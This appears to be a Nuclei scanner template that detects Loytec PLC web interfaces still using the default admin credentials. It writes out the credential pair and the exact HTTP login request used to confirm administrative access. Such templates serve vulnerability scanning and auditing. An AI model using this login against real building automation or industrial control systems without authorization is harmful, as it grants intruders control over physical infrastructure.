Identified Loytec PLC web interfaces that were accessible using default credentials (admin:loytec4u). These devices were commonly deployed in building automation and industrial control environments. When left unchanged, default credentials could have allowed unauthorized users to gain administrative access to the system.
PoC代码[已公开]
id: loytec-default-password
info:
name: Loytec PLC - Default Login
author: biero-el-corridor
severity: high
description: |
Identified Loytec PLC web interfaces that were accessible using default credentials (admin:loytec4u). These devices were commonly deployed in building automation and industrial control environments. When left unchanged, default credentials could have allowed unauthorized users to gain administrative access to the system.
metadata:
verifed: true
max-request: 1
tags: loytec,default-login,vuln
variables:
username: admin
password: loytec4u
http:
- raw:
- |
POST /webui/login HTTP/1.1
Host: {{Hostname}}
X-Create-Session: 1
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=Login
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"sessUser":"admin"'
- '"loggedIn":true'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c5d95a523c26fa85d9a074afd30340b4198cf32401240fce77135c87d14f309b02206fb0dd6139abb8b33044601c639e4ab3532f469684db96f3f60012f44a2cd1ca:922c64590222798bb761d5b6d8e72950